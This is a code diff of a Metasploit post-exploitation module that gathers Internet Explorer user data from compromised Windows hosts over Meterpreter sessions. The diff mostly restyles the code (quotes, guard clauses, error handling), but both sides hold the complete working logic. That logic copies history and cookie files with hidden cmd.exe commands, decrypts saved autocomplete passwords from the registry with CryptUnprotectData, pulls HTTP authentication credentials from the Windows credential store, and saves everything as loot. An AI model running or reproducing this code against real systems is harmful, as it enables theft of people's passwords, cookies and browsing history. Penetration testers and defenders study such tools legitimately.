@@ -11,7 +11,7 @@ class MetasploitModule < Msf::Post
     super(
       update_info(
         info,
-        'Name' => "Windows Gather Internet Explorer User Data Enumeration",
+        'Name' => 'Windows Gather Internet Explorer User Data Enumeration',
         'Description' => %q{
           This module will collect history, cookies, and credentials (from either HTTP
           auth passwords, or saved form passwords found in auto-complete) in
@@ -23,6 +23,11 @@ class MetasploitModule < Msf::Post
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
         'Author' => ['Kx499'],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [],
+          'Reliability' => []
+        },
         'Compat' => {
           'Meterpreter' => {
             'Commands' => %w[
@@ -52,14 +57,14 @@ class MetasploitModule < Msf::Post
   #
   def is_86
     pid = session.sys.process.open.pid
-    return session.sys.process.each_process.find { |i| i["pid"] == pid } ["arch"] == "x86"
+    return session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
   end
 
   def pack_add(data)
     if is_86
-      addr = [data].pack("V")
+      addr = [data].pack('V')
     else
-      addr = [data].pack("Q<")
+      addr = [data].pack('Q<')
     end
     return addr
   end
@@ -78,16 +83,16 @@ class MetasploitModule < Msf::Post
       process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
       raw = process.memory.read(address, len)
       if type == 0 # unicode
-        str_data = raw.gsub("\x00", "")
+        str_data = raw.gsub("\x00", '')
       elsif type == 1 # null terminated
-        str_data = raw.unpack("Z*")[0]
+        str_data = raw.unpack('Z*')[0]
       elsif type == 2 # raw data
         str_data = raw
       end
-    rescue
+    rescue StandardError
       str_data = nil
     end
-    return str_data || "Error Decrypting"
+    return str_data || 'Error Decrypting'
   end
 
   #
@@ -100,7 +105,7 @@ class MetasploitModule < Msf::Post
     entropy.each_byte do |c|
       salt << c
     end
-    ent = salt.pack("v*")
+    ent = salt.pack('v*')
 
     # save values to memory and pack addresses
     mem = mem_write(data, 1024)
@@ -113,13 +118,13 @@ class MetasploitModule < Msf::Post
     # cal railgun to decrypt
     if is_86
       ret = c32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 1, 8)
-      len, add = ret["pDataOut"].unpack("V2")
+      len, add = ret['pDataOut'].unpack('V2')
     else
       ret = c32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 1, 16)
-      len, add = ret["pDataOut"].unpack("Q2")
+      len, add = ret['pDataOut'].unpack('Q2')
     end
 
-    return "" unless ret["return"]
+    return '' unless ret['return']
 
     return read_str(add, len, 2)
   end
@@ -127,13 +132,13 @@ class MetasploitModule < Msf::Post
   def decrypt_cred(daddr, dlen)
     c32 = session.railgun.crypt32
     # set up entropy
-    guid = "abe2869f-9b47-4cd9-a358-c22904dba7f7"
+    guid = 'abe2869f-9b47-4cd9-a358-c22904dba7f7'
     ent_sz = 74
     salt = []
     guid.each_byte do |c|
       salt << c * 4
     end
-    ent = salt.pack("v*")
+    ent = salt.pack('v*')
 
     # write entropy to memory and pack addresses
     mem = mem_write(ent, 1024)
@@ -145,14 +150,14 @@ class MetasploitModule < Msf::Post
     # prep vars and call function
     if is_86
       ret = c32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 8)
-      len, add = ret["pDataOut"].unpack("V2")
+      len, add = ret['pDataOut'].unpack('V2')
     else
       ret = c32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 16)
-      len, add = ret["pDataOut"].unpack("Q<2")
+      len, add = ret['pDataOut'].unpack('Q<2')
     end
 
     # get data, and return it
-    return "" unless ret["return"]
+    return '' unless ret['return']
 
     return read_str(add, len, 0)
   end
@@ -162,16 +167,20 @@ class MetasploitModule < Msf::Post
   #
   def get_stuff(path, history)
     t = DateTime.new(1601, 1, 1, 0, 0, 0)
-    tmpout = ""
+    tmpout = ''
     if history
       re = /\x55\x52\x4C\x20.{4}(.{8})(.{8}).*?\x56\x69\x73\x69\x74\x65\x64\x3A.*?\x40(.*?)\x00/m
     else # get cookies
       re = /\x55\x52\x4C\x20.{4}(.{8})(.{8}).*?\x43\x6F\x6F\x6B\x69\x65\x3A(.*?)\x00/m
     end
 
-    outfile = session.fs.file.new(path, "rb")
+    outfile = session.fs.file.new(path, 'rb')
     until outfile.eof?
-      tmpout << outfile.read rescue nil
+      begin
+        tmpout << outfile.read
+      rescue StandardError
+        nil
+      end
     end
     outfile.close
 
@@ -180,82 +189,80 @@ class MetasploitModule < Msf::Post
       # date modified
       hist = {}
       origh = url[0].unpack('H*')[0]
-      harr = origh.scan(/[0-9A-Fa-f]{2}/).map { |i| i.to_s }
+      harr = origh.scan(/[0-9A-Fa-f]{2}/).map(&:to_s)
       newh = harr.reverse.join
       hfloat = newh.hex.to_f
       sec = hfloat / 10000000
       days = sec / 86400
       timestamp = t + days
-      hist["dtmod"] = timestamp.to_s
+      hist['dtmod'] = timestamp.to_s
 
       # date accessed
       origh = url[1].unpack('H*')[0]
-      harr = origh.scan(/[0-9A-Fa-f]{2}/).map { |i| i.to_s }
+      harr = origh.scan(/[0-9A-Fa-f]{2}/).map(&:to_s)
       newh = harr.reverse.join
       hfloat = newh.hex.to_f
       sec = hfloat / 10000000
       days = sec / 86400
       timestamp = t + days
-      hist["dtacc"] = timestamp.to_s
-      hist["url"] = url[2]
+      hist['dtacc'] = timestamp.to_s
+      hist['url'] = url[2]
       if history
         @hist_col << hist
-        @hist_table << [hist["dtmod"], hist["dtacc"], hist["url"]]
+        @hist_table << [hist['dtmod'], hist['dtacc'], hist['url']]
       else
-        @cook_table << [hist["dtmod"], hist["dtacc"], hist["url"]]
+        @cook_table << [hist['dtmod'], hist['dtacc'], hist['url']]
       end
     end
   end
 
   def hash_url(url)
     rg_advapi = session.railgun.advapi32
-    tail = 0
-    prov = "Microsoft Enhanced Cryptographic Provider v1.0"
-    flag = 0xF0000000
+    prov = 'Microsoft Enhanced Cryptographic Provider v1.0'
     context = rg_advapi.CryptAcquireContextW(4, nil, prov, 1, 0xF0000000)
     h = rg_advapi.CryptCreateHash(context['phProv'], 32772, 0, 0, 4)
-    hdata = rg_advapi.CryptHashData(h['phHash'], url, (url.length + 1) * 2, 0)
+    rg_advapi.CryptHashData(h['phHash'], url, (url.length + 1) * 2, 0)
     hparam = rg_advapi.CryptGetHashParam(h['phHash'], 2, 20, 20, 0)
-    hval_arr = hparam["pbData"].unpack("C*")
-    hval = hparam["pbData"].unpack("H*")[0]
+    hval_arr = hparam['pbData'].unpack('C*')
+    hval = hparam['pbData'].unpack('H*')[0]
     rg_advapi.CryptDestroyHash(h['phHash'])
     rg_advapi.CryptReleaseContext(context['phProv'], 0)
-    tail = hval_arr.inject(0) { |s, v| s += v }
-    htail = ("%02x" % tail)[-2, 2]
+    tail = hval_arr.inject(0) { |s, v| s + v }
+    htail = ('%02x' % tail)[-2, 2]
     return "#{hval}#{htail}"
   end
 
   def run
     # check for meterpreter and version of ie
-    if session.type != "meterpreter" and session.platform !~ /win/
-      print_error("This module only works with Windows Meterpreter sessions")
+    if (session.type != 'meterpreter') && session.platform !~ (/win/)
+      print_error('This module only works with Windows Meterpreter sessions')
       return 0
     end
 
     # get version of ie and check it
-    ver = registry_getvaldata("HKLM\\SOFTWARE\\Microsoft\\Internet Explorer", "Version")
+    ver = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Internet Explorer', 'Version')
     print_status("IE Version: #{ver}")
     if ver =~ /(6\.|5\.)/
-      print_error("This module will only extract credentials for >= IE7")
+      print_error('This module will only extract credentials for >= IE7')
     end
 
     # setup tables
     @hist_table = Rex::Text::Table.new(
-      "Header" => "History data",
-      "Indent" => 1,
-      "Columns" => ["Date Modified", "Date Accessed", "Url"]
+      'Header' => 'History data',
+      'Indent' => 1,
+      'Columns' => ['Date Modified', 'Date Accessed', 'Url']
     )
 
     @cook_table = Rex::Text::Table.new(
-      "Header" => "Cookies data",
-      "Indent" => 1,
-      "Columns" => ["Date Modified", "Date Accessed", "Url"]
+      'Header' => 'Cookies data',
+      'Indent' => 1,
+      'Columns' => ['Date Modified', 'Date Accessed', 'Url']
     )
 
     cred_table = Rex::Text::Table.new(
-      "Header" => "Credential data",
-      "Indent" => 1,
-      "Columns" => ["Type", "Url", "User", "Pass"]
+      'Header' => 'Credential data',
+      'Indent' => 1,
+      'Columns' => ['Type', 'Url', 'User', 'Pass']
     )
 
     # set up vars
@@ -263,13 +270,13 @@ class MetasploitModule < Msf::Post
     @hist_col = []
 
     # set paths
-    regpath = "HKCU\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2"
-    vist_h = "\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat"
-    vist_hlow = "\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat"
-    xp_h = "\\Local Settings\\History\\History.IE5\\index.dat"
-    vist_c = "\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat"
-    vist_clow = "\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat"
-    xp_c = "\\Cookies\\index.dat"
+    regpath = 'HKCU\\Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2'
+    vist_h = '\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat'
+    vist_hlow = '\\AppData\\Local\\Microsoft\\Windows\\History\\Low\\History.IE5\\index.dat'
+    xp_h = '\\Local Settings\\History\\History.IE5\\index.dat'
+    vist_c = '\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\index.dat'
+    vist_clow = '\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat'
+    xp_c = '\\Cookies\\index.dat'
     h_paths = []
     c_paths = []
     base = session.sys.config.getenv('USERPROFILE')
@@ -284,116 +291,116 @@ class MetasploitModule < Msf::Post
     end
 
     # Get history and cookies
-    print_status("Retrieving history.....")
+    print_status('Retrieving history.....')
     h_paths.each do |hpath|
-      if session.fs.file.exist?(hpath)
-        print_line("\tFile: #{hpath}")
-        # copy file
-        cmd = "cmd.exe /c type \"#{hpath}\" > \"#{base}\\index.dat\""
-        r = session.sys.process.execute(cmd, nil, { 'Hidden' => true })
+      next unless session.fs.file.exist?(hpath)
 
-        # loop until cmd is done
-        # while session.sys.process.each_process.find { |i| i["pid"] == r.pid}
-        # end
-        sleep(1)
+      print_line("\tFile: #{hpath}")
+      # copy file
+      cmd = "cmd.exe /c type \"#{hpath}\" > \"#{base}\\index.dat\""
+      session.sys.process.execute(cmd, nil, { 'Hidden' => true })
 
-        # get stuff and delete
-        get_stuff("#{base}\\index.dat", true)
-        cmd = "cmd.exe /c del \"#{base}\\index.dat\""
-        session.sys.process.execute(cmd, nil, { 'Hidden' => true })
-      end
+      # loop until cmd is done
+      # while session.sys.process.each_process.find { |i| i["pid"] == r.pid}
+      # end
+      sleep(1)
+
+      # get stuff and delete
+      get_stuff("#{base}\\index.dat", true)
+      cmd = "cmd.exe /c del \"#{base}\\index.dat\""
+      session.sys.process.execute(cmd, nil, { 'Hidden' => true })
     end
 
-    print_status("Retrieving cookies.....")
+    print_status('Retrieving cookies.....')
     c_paths.each do |cpath|
-      if session.fs.file.exist?(cpath)
-        print_line("\tFile: #{cpath}")
-        # copy file
-        cmd = "cmd.exe /c type \"#{cpath}\" > \"#{base}\\index.dat\""
-        r = session.sys.process.execute(cmd, nil, { 'Hidden' => true })
+      next unless session.fs.file.exist?(cpath)
 
-        # loop until cmd is done
-        # while session.sys.process.each_process.find { |i| i["pid"] == r.pid}
-        # end
-        sleep(1)
+      print_line("\tFile: #{cpath}")
+      # copy file
+      cmd = "cmd.exe /c type \"#{cpath}\" > \"#{base}\\index.dat\""
+      session.sys.process.execute(cmd, nil, { 'Hidden' => true })
 
-        # get stuff and delete
-        get_stuff("#{base}\\index.dat", false)
-        cmd = "cmd.exe /c del \"#{base}\\index.dat\""
-        session.sys.process.execute(cmd, nil, { 'Hidden' => true })
-      end
+      # loop until cmd is done
+      # while session.sys.process.each_process.find { |i| i["pid"] == r.pid}
+      # end
+      sleep(1)
+
+      # get stuff and delete
+      get_stuff("#{base}\\index.dat", false)
+      cmd = "cmd.exe /c del \"#{base}\\index.dat\""
+      session.sys.process.execute(cmd, nil, { 'Hidden' => true })
     end
 
     # get autocomplete creds
-    print_status("Looping through history to find autocomplete data....")
+    print_status('Looping through history to find autocomplete data....')
     val_arr = registry_enumvals(regpath)
     if val_arr
       @hist_col.each do |hitem|
-        url = hitem["url"].split('?')[0].downcase
+        url = hitem['url'].split('?')[0].downcase
         hash = hash_url(url).upcase
-        if val_arr.include?(hash)
-          data = registry_getvaldata(regpath, hash)
-          dec = decrypt_reg(url, data)
+        next unless val_arr.include?(hash)
 
-          # If CryptUnprotectData fails, decrypt_reg() will return "", and unpack() will end up
-          # returning an array of nils. If this happens, we can cause an "undefined method
-          # `+' for NilClass." when we try to calculate the offset, and this causes the module to die.
-          next if dec.empty?
+        data = registry_getvaldata(regpath, hash)
+        dec = decrypt_reg(url, data)
 
-          # decode data and add to creds array
-          header = dec.unpack("VVVVVV")
+        # If CryptUnprotectData fails, decrypt_reg() will return "", and unpack() will end up
+        # returning an array of nils. If this happens, we can cause an "undefined method
+        # `+' for NilClass." when we try to calculate the offset, and this causes the module to die.
+        next if dec.empty?
 
-          offset = header[0] + header[1] # offset to start of data
-          cnt = header[5] / 2 # of username/password combinations
-          secrets = dec[offset, dec.length - (offset + 1)].split("\x00\x00")
-          for i in (0..cnt).step(2)
-            cred = {}
-            cred["type"] = "Auto Complete"
-            cred["url"] = url
-            cred["user"] = secrets[i].gsub("\x00", "")
-            cred["pass"] = secrets[i + 1].gsub("\x00", "") unless secrets[i + 1].nil?
-            cred_table << [cred["type"], cred["url"], cred["user"], cred["pass"]]
-          end
+        # decode data and add to creds array
+        header = dec.unpack('VVVVVV')
+
+        offset = header[0] + header[1] # offset to start of data
+        cnt = header[5] / 2 # of username/password combinations
+        secrets = dec[offset, dec.length - (offset + 1)].split("\x00\x00")
+        for i in (0..cnt).step(2)
+          cred = {}
+          cred['type'] = 'Auto Complete'
+          cred['url'] = url
+          cred['user'] = secrets[i].gsub("\x00", '')
+          cred['pass'] = secrets[i + 1].gsub("\x00", '') unless secrets[i + 1].nil?
+          cred_table << [cred['type'], cred['url'], cred['user'], cred['pass']]
         end
       end
     else
-      print_error("No autocomplete entries found in registry")
+      print_error('No autocomplete entries found in registry')
     end
 
     # get creds from credential store
-    print_status("Looking in the Credential Store for HTTP Authentication Creds...")
+    print_status('Looking in the Credential Store for HTTP Authentication Creds...')
     # get data from credential store
     ret = session.railgun.advapi32.CredEnumerateA(nil, 0, 4, 4)
-    p_to_arr = ret["Credentials"].unpack("V")
-    arr_len = ret["Count"] * 4 if is_86
-    arr_len = ret["Count"] * 8 unless is_86
+    p_to_arr = ret['Credentials'].unpack('V')
+    arr_len = ret['Count'] * 4 if is_86
+    arr_len = ret['Count'] * 8 unless is_86
 
     # read array of addresses as pointers to each structure
     raw = read_str(p_to_arr[0], arr_len, 2)
-    pcred_array = raw.unpack("V*") if is_86
-    pcred_array = raw.unpack("Q<*") unless is_86
+    pcred_array = raw.unpack('V*') if is_86
+    pcred_array = raw.unpack('Q<*') unless is_86
 
     # loop through the addresses and read each credential structure
     pcred_array.each do |pcred|
       raw = read_str(pcred, 52, 2)
-      cred_struct = raw.unpack("VVVVQ<VVVVVVV") if is_86
-      cred_struct = raw.unpack("VVQ<Q<Q<Q<Q<VVQ<Q<Q<") unless is_86
+      cred_struct = raw.unpack('VVVVQ<VVVVVVV') if is_86
+      cred_struct = raw.unpack('VVQ<Q<Q<Q<Q<VVQ<Q<Q<') unless is_86
 
       location = read_str(cred_struct[2], 512, 1)
-      if location.include? "Microsoft_WinInet"
-        decrypted = decrypt_cred(cred_struct[6], cred_struct[5])
-        cred = {}
-        cred["type"] = "Credential Store"
-        cred["url"] = location.gsub("Microsoft_WinInet_", "")
-        cred["user"] = decrypted.split(':')[0] || "No Data"
-        cred["pass"] = decrypted.split(':')[1] || "No Data"
-        cred_table << [cred["type"], cred["url"], cred["user"], cred["pass"]]
-      end
+      next unless location.include? 'Microsoft_WinInet'
+
+      decrypted = decrypt_cred(cred_struct[6], cred_struct[5])
+      cred = {}
+      cred['type'] = 'Credential Store'
+      cred['url'] = location.gsub('Microsoft_WinInet_', '')
+      cred['user'] = decrypted.split(':')[0] || 'No Data'
+      cred['pass'] = decrypted.split(':')[1] || 'No Data'
+      cred_table << [cred['type'], cred['url'], cred['user'], cred['pass']]
     end
 
     # store data in loot
-    if not @hist_table.rows.empty?
-      print_status("Writing history to loot...")
+    if !@hist_table.rows.empty?
+      print_status('Writing history to loot...')
       path = store_loot(
         'ie.history',
         'text/plain',
@@ -405,8 +412,8 @@ class MetasploitModule < Msf::Post
       print_good("Data saved in: #{path}")
     end
 
-    if not @cook_table.rows.empty?
-      print_status("Writing cookies to loot...")
+    if !@cook_table.rows.empty?
+      print_status('Writing cookies to loot...')
       path = store_loot(
         'ie.cookies',
         'text/plain',
@@ -418,8 +425,8 @@ class MetasploitModule < Msf::Post
       print_good("Data saved in: #{path}")
     end
 
-    if not cred_table.rows.empty?
-      print_status("Writing gathered credentials to loot...")
+    if !cred_table.rows.empty?
+      print_status('Writing gathered credentials to loot...')
       path = store_loot(
         'ie.user.creds',
         'text/plain',
@@ -431,7 +438,7 @@ class MetasploitModule < Msf::Post
 
       print_good("Data saved in: #{path}")
       # print creds
-      print_line("")
+      print_line('')
       print_line(cred_table.to_s)
     end
   end
